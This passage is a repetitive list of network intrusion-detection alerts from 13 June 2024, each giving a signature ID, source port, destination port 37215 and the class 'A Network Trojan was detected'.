              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503501
              SID:2835222
              Source Port:52698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456057
              SID:2835222
              Source Port:52338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610220
              SID:2829579
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485370
              SID:2829579
              Source Port:42112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727618
              SID:2835222
              Source Port:55582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838192
              SID:2835222
              Source Port:45896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458228
              SID:2829579
              Source Port:51586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608253
              SID:2829579
              Source Port:48502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091075
              SID:2829579
              Source Port:48870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506208
              SID:2835222
              Source Port:49594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166122
              SID:2835222
              Source Port:60404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724869
              SID:2829579
              Source Port:50668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453993
              SID:2835222
              Source Port:38102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726873
              SID:2829579
              Source Port:55658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783565
              SID:2835222
              Source Port:41716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153162
              SID:2835222
              Source Port:51778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822822
              SID:2829579
              Source Port:32972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824074
              SID:2829579
              Source Port:60668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841675
              SID:2829579
              Source Port:48608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086787
              SID:2829579
              Source Port:41376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680897
              SID:2835222
              Source Port:43732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347439
              SID:2829579
              Source Port:45170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303886
              SID:2829579
              Source Port:48630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659525
              SID:2835222
              Source Port:44864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941278
              SID:2829579
              Source Port:50180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025981
              SID:2829579
              Source Port:53558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307221
              SID:2829579
              Source Port:33510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804665
              SID:2835222
              Source Port:33484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323137
              SID:2835222
              Source Port:47572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310010
              SID:2835222
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995055
              SID:2835222
              Source Port:51084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480229
              SID:2829579
              Source Port:35510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200085
              SID:2829579
              Source Port:55752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456208
              SID:2829579
              Source Port:47814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.507933
              SID:2829579
              Source Port:35858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248571
              SID:2835222
              Source Port:58574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245621
              SID:2829579
              Source Port:46204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377610
              SID:2829579
              Source Port:41778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108564
              SID:2829579
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407205
              SID:2829579
              Source Port:58004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546429
              SID:2829579
              Source Port:35490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417634
              SID:2829579
              Source Port:34306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608567
              SID:2835222
              Source Port:54902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278200
              SID:2829579
              Source Port:60154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486783
              SID:2829579
              Source Port:56540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402321
              SID:2829579
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297936
              SID:2829579
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456688
              SID:2835222
              Source Port:37238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728669
              SID:2835222
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153118
              SID:2829579
              Source Port:43760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508079
              SID:2835222
              Source Port:53800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408784
              SID:2835222
              Source Port:34314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884814
              SID:2829579
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438622
              SID:2835222
              Source Port:41590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884607
              SID:2835222
              Source Port:45992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843800
              SID:2835222
              Source Port:33820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216807
              SID:2829579
              Source Port:51660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259225
              SID:2829579
              Source Port:43964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176205
              SID:2835222
              Source Port:54862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238651
              SID:2829579
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090113
              SID:2835222
              Source Port:35288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569268
              SID:2829579
              Source Port:34394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451355
              SID:2835222
              Source Port:47902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633759
              SID:2829579
              Source Port:57908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176516
              SID:2829579
              Source Port:51012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994290
              SID:2835222
              Source Port:55654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617805
              SID:2829579
              Source Port:40474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832679
              SID:2829579
              Source Port:59014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992736
              SID:2835222
              Source Port:38110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697324
              SID:2835222
              Source Port:41216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786904
              SID:2829579
              Source Port:47292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457445
              SID:2829579
              Source Port:33414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127335
              SID:2835222
              Source Port:58184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378026
              SID:2829579
              Source Port:44360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055478
              SID:2835222
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043477
              SID:2829579
              Source Port:57774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570978
              SID:2835222
              Source Port:38818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040366
              SID:2835222
              Source Port:60908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424840
              SID:2835222
              Source Port:33944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160507
              SID:2835222
              Source Port:54142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416848
              SID:2835222
              Source Port:32964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259315
              SID:2829579
              Source Port:51182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486083
              SID:2835222
              Source Port:34220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195836
              SID:2829579
              Source Port:43546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545828
              SID:2835222
              Source Port:39260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819964
              SID:2829579
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459090
              SID:2835222
              Source Port:59830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952479
              SID:2829579
              Source Port:45700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406587
              SID:2829579
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303359
              SID:2829579
              Source Port:52664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087329
              SID:2835222
              Source Port:34732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.197667
              SID:2835222
              Source Port:51910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098547
              SID:2829579
              Source Port:51358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154212
              SID:2835222
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266286
              SID:2829579
              Source Port:44702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108194
              SID:2835222
              Source Port:58298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212434
              SID:2829579
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228245
              SID:2829579
              Source Port:50110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612059
              SID:2835222
              Source Port:47066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753766
              SID:2829579
              Source Port:48612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247687
              SID:2835222
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803267
              SID:2829579
              Source Port:39374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237747
              SID:2835222
              Source Port:56778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093613
              SID:2835222
              Source Port:54988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456364
              SID:2835222
              Source Port:40768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974255
              SID:2829579
              Source Port:56146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503588
              SID:2835222
              Source Port:45828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553246
              SID:2829579
              Source Port:43672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.152772
              SID:2835222
              Source Port:46394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728124
              SID:2835222
              Source Port:34204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554586
              SID:2835222
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421733
              SID:2835222
              Source Port:44806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972994
              SID:2829579
              Source Port:34972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756872
              SID:2829579
              Source Port:50808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127909
              SID:2835222
              Source Port:55334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302501
              SID:2835222
              Source Port:47930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307743
              SID:2829579
              Source Port:34056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348947
              SID:2835222
              Source Port:48430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357310
              SID:2829579
              Source Port:54256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788332
              SID:2835222
              Source Port:52194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992633
              SID:2829579
              Source Port:53734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046037
              SID:2829579
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457722
              SID:2835222
              Source Port:59934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374551
              SID:2835222
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273664
              SID:2829579
              Source Port:43222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093545
              SID:2829579
              Source Port:52926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978594
              SID:2835222
              Source Port:51420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090759
              SID:2835222
              Source Port:60300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711284
              SID:2835222
              Source Port:54920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357114
              SID:2829579
              Source Port:52488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322177
              SID:2835222
              Source Port:49680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729706
              SID:2835222
              Source Port:43300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.425001
              SID:2829579
              Source Port:48334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711221
              SID:2829579
              Source Port:55566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868839
              SID:2835222
              Source Port:41952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093854
              SID:2829579
              Source Port:48458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889112
              SID:2829579
              Source Port:42630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195005
              SID:2829579
              Source Port:56732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758539
              SID:2835222
              Source Port:59208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634536
              SID:2829579
              Source Port:47168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155663
              SID:2829579
              Source Port:53274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546872
              SID:2835222
              Source Port:48110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241772
              SID:2835222
              Source Port:50698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566141
              SID:2829579
              Source Port:44138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276928
              SID:2829579
              Source Port:54642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801857
              SID:2829579
              Source Port:38978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345935
              SID:2829579
              Source Port:47496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110354
              SID:2835222
              Source Port:57058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782986
              SID:2835222
              Source Port:44594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151418
              SID:2835222
              Source Port:38374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977646
              SID:2835222
              Source Port:42490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079890
              SID:2829579
              Source Port:45622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216491
              SID:2829579
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454384
              SID:2829579
              Source Port:59640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075579
              SID:2829579
              Source Port:38474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165497
              SID:2835222
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246967
              SID:2829579
              Source Port:38474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168733
              SID:2829579
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992074
              SID:2829579
              Source Port:48654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060506
              SID:2829579
              Source Port:41570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670417
              SID:2829579
              Source Port:45204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160621
              SID:2829579
              Source Port:58472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422507
              SID:2829579
              Source Port:35806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258272
              SID:2829579
              Source Port:43900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994658
              SID:2829579
              Source Port:33972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094028
              SID:2835222
              Source Port:50670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945409
              SID:2835222
              Source Port:58866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450511
              SID:2835222
              Source Port:38292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823027
              SID:2835222
              Source Port:40842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929671
              SID:2829579
              Source Port:60110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941743
              SID:2835222
              Source Port:48624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404333
              SID:2829579
              Source Port:39624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192419
              SID:2829579
              Source Port:33444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241970
              SID:2829579
              Source Port:60134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174100
              SID:2829579
              Source Port:40874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551957
              SID:2829579
              Source Port:39976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505623
              SID:2835222
              Source Port:51076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758027
              SID:2835222
              Source Port:52040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606570
              SID:2829579
              Source Port:46878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757183
              SID:2829579
              Source Port:60786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912723
              SID:2829579
              Source Port:35988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503724
              SID:2829579
              Source Port:46422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629157
              SID:2835222
              Source Port:56122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048098
              SID:2835222
              Source Port:38936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132255
              SID:2829579
              Source Port:52560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038293
              SID:2835222
              Source Port:39318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210838
              SID:2835222
              Source Port:52866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544695
              SID:2829579
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405873
              SID:2835222
              Source Port:54278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417954
              SID:2835222
              Source Port:41186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607006
              SID:2835222
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175617
              SID:2829579
              Source Port:40546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045370
              SID:2829579
              Source Port:40090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657484
              SID:2829579
              Source Port:58994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011740
              SID:2835222
              Source Port:59836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543590
              SID:2829579
              Source Port:58448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455850
              SID:2835222
              Source Port:46198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
